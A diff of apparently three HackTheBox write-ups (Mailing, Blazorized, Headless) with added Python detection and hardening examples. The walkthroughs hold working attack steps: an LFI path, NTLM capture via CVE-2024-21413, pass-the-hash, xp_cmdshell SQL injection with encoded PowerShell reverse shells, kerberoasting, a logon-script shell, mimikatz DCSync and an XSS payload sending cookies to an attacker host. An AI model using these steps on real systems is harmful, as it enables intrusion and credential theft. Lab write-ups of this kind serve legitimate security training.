nmap -sCV -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001... 10.10.11.14 -oN targeted
```
![Image](/assets/img/post/mailing/3.png)
![Image](/assets/img/post/mailing/4.png)
![Image](/assets/img/post/mailing/5.png)
#### **Adding Domain to Hosts File**
```bash
echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
```
![Image](/assets/img/post/mailing/6.png)
![Image](/assets/img/post/mailing/7.png)
## **Information Gathering**
Below the website you can download a pdf file.
![Image](/assets/img/post/mailing/8.png)
the file download has this potential `LFI`
![Image](/assets/img/post/mailing/9.png)
### Directory Brute Forcing
Dirsearch
![Image](/assets/img/post/mailing/10.png)
Or with curl -I can give you something interesting
`curl -I <http://mailing.htb/`>
![Image](/assets/img/post/mailing/11.png)
## **Exploitation**
Our first foothold is the **LFI** found. We go to intercept the request and see what we can do.
`/download.php?file=../../windows/system32/drivers/etc/hosts`{: filepath}
![Image](/assets/img/post/mailing/12.png)
We will try to point to the hosts file to confirm if we are against an LFI.
After exploring the folder structure of hMailServer and asking ChatGPT what should be inside, I found the `hMailServer.INI` file in the `bin` folder and `hmailserver_awstats.log` in the `logs` folder. [Structure folder from hMailServer](https://www.hmailserver.com/documentation/v4.4/?page=folderstructure)
I accessed the logs to determine which emails I can access.
![Image](/assets/img/post/mailing/13.png)
In the `hMailServer.INI` file, I found the passwords for the admin and the database
![Image](/assets/img/post/mailing/14.png)
Using a hash identifier to determine the type of hash before attempting to crack it
![Image](/assets/img/post/mailing/15.png)
We can use [crackstation](https://crackstation.net/) for crack it or use `hashcat` as alternative
![Image](/assets/img/post/mailing/16.png)
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash2.txt`
```bash
hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt
```
- `m 0` sets the mode to MD5.
- `a 0` specifies a dictionary attack.
![Image](/assets/img/post/mailing/17.png)
841bb5acfa6779ae432fd7a4e6600ba7:`homenetworkingadministrator`
## **Telnet**
I'm using Telnet to verify if I can access the mail using this password.
![Image](/assets/img/post/mailing/18.png)
![Image](/assets/img/post/mailing/19.png)
But we cant do anything, there is no exploitable email in the mailbox, but now that I have the credentials of the mail server, I thought that I could obtain NTLM by forcing access to the responder.
`NTLM Hash (Windows Challenge/Response) is the cryptographic format in which user passwords are stored on Windows systems.`
[**¿How works the NTLM Authentication?**](https://www.ionos.mx/digitalguide/servidores/know-how/ntlm/)
After investigating some CVEs, I found one that allows me to send an email to the Maya user found in the log, for to capture an NTLM password.
## CVE-2024-21413
`sudo responder -I tun0`
```bash
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.20\mailing' --subject HI
```
![Image](/assets/img/post/mailing/20.png)
![Image](/assets/img/post/mailing/21.png)
`Hash from user maya`
```text
maya::MAILING:5e0eb9256971de1f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
```
## Hashcat
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash.txt`
```
hashcat -m 5600 hash.txt -a 0 -o cracked_passwords.txt /usr/share/wordlists/rocky
```
- `m 5600` specifies the NTLMv2 hash mode.
- `a 0` specifies a dictionary attack.
-
![Image](/assets/img/post/mailing/22.png)
![Image](/assets/img/post/mailing/23.png)
## Evil-Winrm
`evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'`
![Image](/assets/img/post/mailing/24.png)
User flag
![Image](/assets/img/post/mailing/25.png)
## **Privilege Escalation**
After researching how to perform Privilege Escalation on a Windows server, I found some CVEs that seem interesting, such as CVE-2023-2255 for LibreOffice.
![Image](/assets/img/post/mailing/26.png)
[_**CVE Libre Office**_](https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file)
**CVE-2023-2255**
`python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'`
To accomplish this, I will embed the user Maya into the exploit.odt file and grant permissions to the local group Administradores.
## **SMB Server**
There is an important documents folder under C:. Note that the folder has administrator rights to run.
![Image](/assets/img/post/mailing/27.png)
Most likely you put the odt file in there (important documents) and then get the admin shell
`impacket-smbserver mailing` pwd `-smb2support`
![Image](/assets/img/post/mailing/28.png)
Let the Maya user, running in `evil-winrm`, connect and copy the `exploit.odt` file into the `Important Documents` directory, prompting Maya to click and run the `exploit.odt` file.
```
net use \\\\10.10.16.20\\mailing
copy \\\\10.10.16.20\\mailing\\exploit.odt
```
![Image](/assets/img/post/mailing/29.png)
After waiting for a few seconds, I'll check the status of the Maya user.
`net user maya`
## **Dump SAM Hash**
![Image](/assets/img/post/mailing/30.png)
⭐_HackTool:Win32/Dump is a command line tool that dumps password hashes from Windows NT's SAM(Security Accounts Manager) database. The dumped password hashes can be fed into an NT password auditing tool, such as L0phtCrack to recover the passwords of Windows NT users._
**`crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam`**
- `crackmapexec smb`: specifies that `crackmapexec` will interact with the SMB protocol. `crackmapexec` is a versatile tool for pentesting network services, SMB being one of them.
- `-u maya`: the username to use when authenticating to the SMB service on the target machine.
- `-p "m4y4ngs4ri"`: the password for that username. Together with the username, this forms the credentials used for SMB authentication.
- `--sam`: instructs `crackmapexec` to attempt to dump the SAM (Security Account Manager) database. The SAM stores the local user credentials of a Windows system, typically as hashed passwords. Dumping the SAM retrieves these hashes, which can then be cracked offline to obtain plaintext passwords.
![Image](/assets/img/post/mailing/31.png)
## **Remote Windows machine using WMIExec**
`impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`
- `impacket-wmiexec`: a script from the Impacket suite, a collection of Python classes for working with network protocols. `impacket-wmiexec` executes commands remotely on Windows systems using WMI.
- `localadmin@10.10.11.14`:
- `localadmin` is the username used to authenticate.
- `10.10.11.14` is the IP address of the target machine where the commands will be executed.
- `-hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`:
- `-hashes` specifies that hash values are used for authentication instead of a plaintext password (pass-the-hash).
- `aad3b435b51404eeaad3b435b51404ee` is the LM hash. It is often just a placeholder, since LM hashing is weak and is disabled on modern systems.
- `9aa582783780d1546d62f2d102daefae` is the NT hash, the hash of the account's actual password.
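The two points above, the LM "placeholder" and the fact that an NT hash alone is enough to authenticate, are what a defender should look for in a SAM dump. The following is an added example (not part of the write-up and not Impacket or CrackMapExec code) that parses `user:rid:lm:nt:::` lines and flags the conditions worth fixing: a real LM hash (LM hashing still enabled), an empty password, and the same NT hash reused across accounts, which is what makes one leaked hash open several accounts or hosts. The sample dump and every non-empty hash in it are constructed values.

```python
import re

# Well-known hash of an empty LM password. When LM hashing is disabled this is the value
# that shows up in the LM field, which is why the write-up calls it a placeholder.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
# Well-known NT hash of an empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One line of a secretsdump / crackmapexec --sam style dump: user:rid:lmhash:nthash:::
SAM_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample dump. All non-empty hashes are invented values.
SAMPLE_DUMP = """\
[+] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
localadmin:1001:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
legacysvc:1002:0123456789abcdef0123456789abcdef:22222222222222222222222222222222:::
"""


def parse_sam_dump(text):
    """Return one dict per hash line; tool banners and other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entry["lm"] = entry["lm"].lower()
            entry["nt"] = entry["nt"].lower()
            entries.append(entry)
    return entries


def audit_sam_entries(entries):
    """Return (account, finding) pairs for the conditions worth fixing or watching."""
    findings = []
    for e in entries:
        if e["lm"] != EMPTY_LM_HASH:
            findings.append((e["user"], "LM hash stored: LM hashing is still enabled for this account"))
        if e["nt"] == EMPTY_NT_HASH:
            findings.append((e["user"], "empty password"))
    # The same NT hash on several accounts means one leaked hash opens all of them,
    # and if the image is shared between hosts it opens those hosts too (pass-the-hash).
    by_nt = {}
    for e in entries:
        if e["nt"] != EMPTY_NT_HASH:
            by_nt.setdefault(e["nt"], []).append(e["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((", ".join(users), "same NT hash reused across accounts"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_sam_entries(parse_sam_dump(SAMPLE_DUMP)):
        print(f"{account}: {finding}")
```

The reuse check is the one that matters most for this box: the `localadmin` hash was usable with `wmiexec` precisely because NTLM authentication accepts the hash itself, so rotating per-host local administrator passwords (LAPS or equivalent) is the mitigation rather than merely "cracking resistance".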
[Impacket-wmiexec](https://tools.thehacker.recipes/impacket)
![Image](/assets/img/post/mailing/32.png)
`Root`

@ -0,0 +1,288 @@
---
title: HTB - Blazorized
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Blazorized]
tags: [HackTheBox, NTLM, Evil-winrm, nmap, hashcat, Movement Lateral, Active Directory, BloodHound, mimikatz, logoncount, Blazor, metasploit, sqlinjection, powershell, winPEAS]
image:
path: /assets/img/post/blazorized/Blazorized-card.png
lqip: 
alt: Hack the Box - Blazorized.
---
## Box Info
| Name | Blazorized |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Windows |
| Rated Difficulty | Medium |
## **Enumeration**
Tip:
![Image](/assets/img/post/blazorized/0.png)
## **Nmap**
![Image](/assets/img/post/blazorized/1.png)
## Web
![Image](/assets/img/post/blazorized/2.png)
Port 445: `Microsoft Directory Services`
```bash
smbclient -L //blazorized.htb
```
![Image](/assets/img/post/blazorized/3.png)
## Scan Subdomains
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.blazorized.htb" -u http://blazorized.htb -t 100
```
![Image](/assets/img/post/blazorized/4.png)
With ffuf
```bash
ffuf -c -u "http://blazorized.htb" -H "host: FUZZ.blazorized.htb" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,302 -mc all
```
![Image](/assets/img/post/blazorized/5.png)
We found a subdomain called 'admin' and added it to our hosts file.
The web application on port 80 is built with `Blazor WebAssembly`.
![Image](/assets/img/post/blazorized/6.png)
Blazor WebAssembly works with JS and JSON.
![Image](/assets/img/post/blazorized/7.png)
We found a script written in JS.
![Image](/assets/img/post/blazorized/8.png)
To read the code more easily, copy and paste it into the beautifier.io site.
![Image](/assets/img/post/blazorized/9.png)
We found an interesting path.
![Image](/assets/img/post/blazorized/10.png)
The _framework folder contains essential files for the operation of the Blazor application, including `.dll files`, `resources`, and `configuration files`.
- `/_framework/blazor.webassembly.js`: Essential for running Blazor apps
- `/_framework/wasm/`: Contains WebAssembly binaries
Download the DLLs to decompile them.
![Image](/assets/img/post/blazorized/11.png)
## DLL Analysis
Decompile the DLLs using `dnSpy` on Windows.
![Image](/assets/img/post/blazorized/12.png)
`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIwMDAwMDAwfQ.tJptKXJlG9KDSjxR9Y3gxdcSy7fHj-50GS6_Dd9PAOk`
Build a JWT for Super_Admin
![Image](/assets/img/post/blazorized/13.png)
**Set the jwt token to Local Storage:**
![Image](/assets/img/post/blazorized/14.png)
We need to use this as the secret key for the JWT (don't forget it).
![Image](/assets/img/post/blazorized/15.png)
Now copy the token created on jwt.io and store it in the site's local storage.
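Why the leaked key is fatal: an HS256 token is only as secret as the key that signs it, and a key compiled into a client-side DLL is available to every visitor. The following is an added example, not code from the write-up or from the Blazorized application, that decodes the quoted token to show its claims (without trusting it), and implements the verification an API should perform: pin the algorithm, check the HMAC, and check `exp`, `iss` and `aud`. The `demo-secret` value and the `Reader` role used in the usage note are constructed; the real key from the DLL is not reproduced here.

```python
import base64
import hashlib
import hmac
import json
import time

# Token quoted in the write-up. It is decoded below only to display its claims.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3Mi"
    "OiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2"
    "L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRi"
    "IiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIwMDAwMDAwfQ."
    "tJptKXJlG9KDSjxR9Y3gxdcSy7fHj-50GS6_Dd9PAOk"
)
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
ISSUER = "http://api.blazorized.htb"
AUDIENCE = "http://admin.blazorized.htb"


def _b64url_decode(segment):
    """Base64url decode, re-adding the '=' padding that JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment.encode("ascii"))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt_unverified(token):
    """Return (header, payload) without checking the signature. Never authorize on this."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def sign_jwt_hs256(payload, secret):
    """Mint an HS256 token; this is all an attacker needs once the secret leaks."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_jwt_hs256(token, secret, issuer, audience, now=None):
    """Return the payload if signature, algorithm, exp, iss and aud all check out, else None."""
    now = time.time() if now is None else now
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":   # pin the algorithm; never let the token choose it
            return None
        expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        payload = json.loads(_b64url_decode(payload_b64))
    except ValueError:                     # malformed base64 or JSON
        return None
    if payload.get("iss") != issuer or payload.get("aud") != audience:
        return None
    if not isinstance(payload.get("exp"), (int, float)) or now >= payload["exp"]:
        return None
    return payload


if __name__ == "__main__":
    header, claims = decode_jwt_unverified(PAGE_TOKEN)
    print(header["alg"], claims[ROLE_CLAIM], claims["exp"])
```

With a constructed `demo-secret`, `verify_jwt_hs256(sign_jwt_hs256({...}, "demo-secret"), "demo-secret", ISSUER, AUDIENCE)` returns the claims, while the same token checked with any other key, or checked after `exp`, returns `None`. The lesson for the application is that the signing key must live only on the API side (or the API should switch to an asymmetric algorithm such as RS256 so the client only ever holds the public key).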
![Image](/assets/img/post/blazorized/16.png)
![Image](/assets/img/post/blazorized/17.png)
The "Check Duplicate" section of the site queries the database to see whether a category is duplicated, so we exploit this with SQL injection.
![Image](/assets/img/post/blazorized/18.png)
The site runs Microsoft SQL Server, which we can use to get a reverse shell. [Hacktricks](https://book.hacktricks.xyz/v/es/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
![Image](/assets/img/post/blazorized/19.png)
Now we are going to use these commands and find out if we are successful.
![Image](/assets/img/post/blazorized/20.png)
```sql
test'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
```
```sql
test'; exec master..xp_cmdshell 'powershell -e *powershellBase64*';-- -
```
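From the detection side, both statements above have a recognisable shape once the application's query log (or SQL Server audit) is in hand: a quote closed early, a second statement stacked after `;`, `sp_configure` flipping `xp_cmdshell` on, and a trailing comment swallowing the rest of the original query. The following is an added example, not code from the write-up, that runs those signatures over a handful of constructed log entries showing how the "Check Duplicate" query would look with normal input and with the two injections.

```python
import re

# Signatures of xp_cmdshell enablement/abuse through stacked or injected statements.
PATTERNS = [
    ("enable_advanced_options", re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    ("enable_xp_cmdshell", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell_call", re.compile(r"\bxp_cmdshell\b", re.I)),
    # a closing quote immediately followed by a statement terminator and a new verb
    ("stacked_after_quote", re.compile(r"'\s*;\s*(exec|execute|declare|select|insert|update|delete|drop)\b", re.I)),
    # statement terminator followed by a line comment: the classic injection tail
    ("terminator_then_comment", re.compile(r";\s*--")),
]

# Constructed statements as an application-side query log would record them: the duplicate
# check with ordinary input, then with the two injected inputs from the write-up.
SAMPLE_QUERY_LOG = [
    "SELECT COUNT(*) FROM Categories WHERE Name = 'Kerberos'",
    "SELECT COUNT(*) FROM Categories WHERE Name = 'test'; EXEC sp_configure 'show advanced options',1; "
    "RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -'",
    "SELECT COUNT(*) FROM Categories WHERE Name = 'test'; exec master..xp_cmdshell 'powershell -e <base64>';-- -'",
    "SELECT 1 -- liveness probe",
]


def classify_statement(sql):
    """Names of every signature the statement matches (empty list for benign statements)."""
    return [name for name, rx in PATTERNS if rx.search(sql)]


def scan_query_log(statements):
    """Return (line_no, statement, signatures) for each statement that matched anything."""
    hits = []
    for line_no, stmt in enumerate(statements, 1):
        names = classify_statement(stmt)
        if names:
            hits.append((line_no, stmt, names))
    return hits


if __name__ == "__main__":
    for line_no, stmt, names in scan_query_log(SAMPLE_QUERY_LOG):
        print(f"line {line_no}: {', '.join(names)}")
```

The matching signatures are evidence, not the fix: the query should bind `Name` as a parameter so the quote is data rather than syntax, and the application's login should not be `sysadmin`, since by default only that role can enable or call `xp_cmdshell`. Whether it was ever enabled on a server can be checked with `SELECT name, value_in_use FROM sys.configurations WHERE name IN ('show advanced options', 'xp_cmdshell')`.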
## Nu_1055
We got the shell!
![Image](/assets/img/post/blazorized/21.png)
Change the shell to a meterpreter shell, create a payload, upload and execute.
![Image](/assets/img/post/blazorized/22.png)
![Image](/assets/img/post/blazorized/23.png)
![Image](/assets/img/post/blazorized/24.png)
This practice is more convenient for executing certain commands that we cannot perform in the previous shell.
![Image](/assets/img/post/blazorized/25.png)
BloodHound is a tool for visualizing relationships and permissions within an Active Directory (AD) or Azure environment (Azure Active Directory, AAD).
[BloodHound](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
Upload SharpHound.ps1 to the victim machine with Metasploit and execute the following command:
```shell
powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all"
```
![Image](/assets/img/post/blazorized/26.png)
Download the .zip to our attack machine with Metasploit.
![Image](/assets/img/post/blazorized/27.png)
![Image](/assets/img/post/blazorized/28.png)
![Image](/assets/img/post/blazorized/29.png)
## Lateral Movement
Extract the zip and load it into BloodHound.
<https://www.freebuf.com/articles/web/288370.html>
![Image](/assets/img/post/blazorized/30.png)
### WriteSPN
- BloodHound reveals that `NU_1055` has the `WriteSPN` privilege on the `RSA_4810` account
- Vulnerable to SPN-jacking
![Image](/assets/img/post/blazorized/31.png)
![Image](/assets/img/post/blazorized/32.png)
Upload PowerView.ps1 with Metasploit and execute:
Set the SPN:
```powershell
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/test'}
```
Request a service ticket:
```powershell
Get-DomainSPNTicket -SPN test/test
```
![Image](/assets/img/post/blazorized/33.png)
<https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html>
**Tip**: make sure the hash occupies a single line in your .txt file, with no line breaks inside it.
From this:
![Image](/assets/img/post/blazorized/34.png)
to this:
![Image](/assets/img/post/blazorized/35.png)
#### Hashcat
Cracked the hash with **hashcat**
```bash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -o found.txt --force
```
![Image](/assets/img/post/blazorized/36.png)
password: `(Ni7856Do9854Ki05Ng0005 #)`
![Image](/assets/img/post/blazorized/37.png)
Use evil-winrm to log in as RSA_4810:
```bash
sudo evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
```
### RSA_4810
![Image](/assets/img/post/blazorized/38.png)
Upload PowerView.ps1 as RSA_4810 and use the Get-NetUser command.
![Image](/assets/img/post/blazorized/39.png)
### SSA_6010
The other users have a `logoncount` of 0, while the user `SSA_6010` has a logoncount of 4236.
LogonCount is a login count, a property that is part of the profile information in an `Active Directory (AD)` environment.
![Image](/assets/img/post/blazorized/40.png)
From BloodHound we can see that RSA_4810 is a member of the group Remote_Support_Administrators.
Upload and run `winPEAS`; it shows us a writable path.
We have write privileges on the A32FF3AEAA23 directory in SYSVOL.
```powershell
icacls A32FF3AEAA23
```
![Image](/assets/img/post/blazorized/41.png)
```powershell
'powershell -e *base64*' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\revshell.bat -Encoding ASCII
```
```powershell
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\revshell.bat'
```
![Image](/assets/img/post/blazorized/42.png)
Wait a moment and we get a shell as SSA_6010. Upload SharpHound again, or look back in BloodHound at the "Find Principals with DCSync Rights" query, and we see that SSA_6010 has DCSync rights.
![Image](/assets/img/post/blazorized/43.png)
Upload mimikatz.exe and execute the following command:
```
lsadump::dcsync /domain:blazorized.htb /user:Administrator
```
![Image](/assets/img/post/blazorized/44.png)
And we get the NT hash to use with evil-winrm.
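Each of the three steps in this chain (the RC4 service-ticket request after the SPN was set, the logon-script change on SSA_6010, and the DCSync replication request) leaves a distinct Windows security event on the domain controller. The following is an added example, not code from the write-up, of the three triage rules a SOC would run over those events: 4769 TGS requests with RC4 encryption (`0x17`/`0x18`) for a user service account, 4738 account changes where the Script Path attribute was set, and 4662 events carrying the DS-Replication-Get-Changes control-access GUIDs from a principal that is not a domain controller account. The events are constructed dicts carrying only the fields the rules need; usernames follow the write-up, addresses and the `helpdesk`/`jdoe` entries are invented. (The SPN write itself shows up as event 5136 when directory-object auditing is enabled, which this example does not cover.)

```python
# Constructed Windows security events reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "NU_1055@BLAZORIZED.HTB", "ServiceName": "RSA_4810",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "DC1$@BLAZORIZED.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.22"},
    {"EventID": 4769, "TargetUserName": "jdoe@BLAZORIZED.HTB", "ServiceName": "DC1$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.40"},
    {"EventID": 4738, "SubjectUserName": "RSA_4810", "TargetUserName": "SSA_6010",
     "ScriptPath": "A32FF3AEAA23\\revshell.bat"},
    {"EventID": 4738, "SubjectUserName": "helpdesk", "TargetUserName": "jdoe", "ScriptPath": "-"},
    {"EventID": 4662, "SubjectUserName": "SSA_6010",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC1$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

RC4_ETYPES = {"0x17", "0x18"}          # RC4-HMAC and RC4-HMAC-EXP
DCSYNC_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes-All
)


def kerberoast_candidates(events):
    """4769 requests for RC4 service tickets to a user account (not a computer, not krbtgt)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES:
            hits.append((ev["TargetUserName"], svc, ev.get("IpAddress")))
    return hits


def logon_script_changes(events):
    """4738 account changes where Script Path was set ('-' means the attribute did not change)."""
    return [
        (ev["SubjectUserName"], ev["TargetUserName"], ev["ScriptPath"])
        for ev in events
        if ev.get("EventID") == 4738 and ev.get("ScriptPath", "-") != "-"
    ]


def dcsync_candidates(events):
    """4662 with replication control-access rights requested by a non-computer account."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        subject = ev.get("SubjectUserName", "")
        if any(g in props for g in DCSYNC_GUIDS) and not subject.endswith("$"):
            hits.append(subject)
    return hits


if __name__ == "__main__":
    print("kerberoast:", kerberoast_candidates(SAMPLE_EVENTS))
    print("logon script set:", logon_script_changes(SAMPLE_EVENTS))
    print("dcsync:", dcsync_candidates(SAMPLE_EVENTS))
```

The computer-account exclusions (`$` suffix) are what keep these rules quiet on a healthy domain: DCs replicate with each other constantly and services request AES tickets; a human account requesting RC4 tickets, setting logon scripts, or replicating the directory is the anomaly.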
![Image](/assets/img/post/blazorized/45.png)
Rooted

@ -0,0 +1,136 @@
---
title: HTB - Headless
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Headless]
tags: [HackTheBox, Python Werkzeug, XSS, User-Agent]
image:
path: /assets/img/post/headless/Headless-card.png
lqip: 
alt: Hack the Box - Headless.
---
## Box Info
| Name | Headless |
| :-------------------- | ---------------: |
| Release Date | 23 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -A -Pn 10.10.11.8 -oG allPorts
```
![Image](/assets/img/post/headless/1.png)
[http://10.10.11.8:5000/](http://10.10.11.8:5000/)
![Image](/assets/img/post/headless/2.png)
## Scan Directory
We didn't find anything interesting...
![Image](/assets/img/post/headless/3.png)
### BurpSuite
Now go to /support
![Image](/assets/img/post/headless/5.png)
And we try to intercept this with Burpsuite
![Image](/assets/img/post/headless/4.png)
If I try some HTML injection, the response returns the content of the HTTP request.
![Image](/assets/img/post/headless/attemp.png)
The HTTP `response` headers show it's a `Werkzeug / Python server`.
**Exploitation**
**Blind XSS on User-Agent**
After a long time trying to figure it out, I found the XSS is in the headers: put `header-false: a<script>alert(1)</script>` in the request.
`<img src=x onerror=fetch('http://<IP>:<PORT>/'+document.cookie);>`
![Image](/assets/img/post/headless/6.png)
**Python Server**
`python -m http.server 8020`
![Image](/assets/img/post/headless/7.png)
![Image](/assets/img/post/headless/8.png)
After exploiting the XSS in the User-Agent header, we get a callback with the **admin cookie** at the Python server.
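Two separate mistakes made this possible: the report page interpolated request headers into HTML without escaping, and the admin session cookie was readable from JavaScript. The following is an added example, not code from the write-up or from the Headless application, showing the vulnerable rendering beside the escaped one (the header set is constructed, with the User-Agent payload quoted above) and a `Set-Cookie` value with `HttpOnly`, which is what stops `document.cookie` from leaking the session even if a script does run.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed support-form request; the User-Agent carries the payload from the write-up.
SAMPLE_HEADERS = {
    "Host": "10.10.11.8:5000",
    "User-Agent": "<img src=x onerror=fetch('http://<IP>:<PORT>/'+document.cookie);>",
    "Accept": "text/html",
}


def render_report_unsafe(headers):
    """Interpolates header values straight into HTML, the way the vulnerable page did."""
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in headers.items())
    return f"<table>{rows}</table>"


def render_report_safe(headers):
    """Escapes every value, so the User-Agent is displayed as text instead of parsed as markup."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
        for k, v in headers.items()
    )
    return f"<table>{rows}</table>"


RAW_TAG = re.compile(r"<\s*(script|img|svg|iframe|object|embed)\b", re.I)


def contains_raw_tag(fragment):
    """True if an unescaped active tag survived rendering ('&lt;img' does not match)."""
    return RAW_TAG.search(fragment) is not None


def admin_session_cookie(value):
    """Set-Cookie value for the admin session; HttpOnly keeps it out of document.cookie."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(render_report_unsafe(SAMPLE_HEADERS))
    print(render_report_safe(SAMPLE_HEADERS))
    print(admin_session_cookie("constructed-session-value"))
```

A Flask view that returned the report through a Jinja template would have had this escaping applied automatically for `.html` templates; the bug is building HTML by hand. `HttpOnly` is defence in depth rather than a fix: the script still executes in the admin's browser, it just cannot read the cookie.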
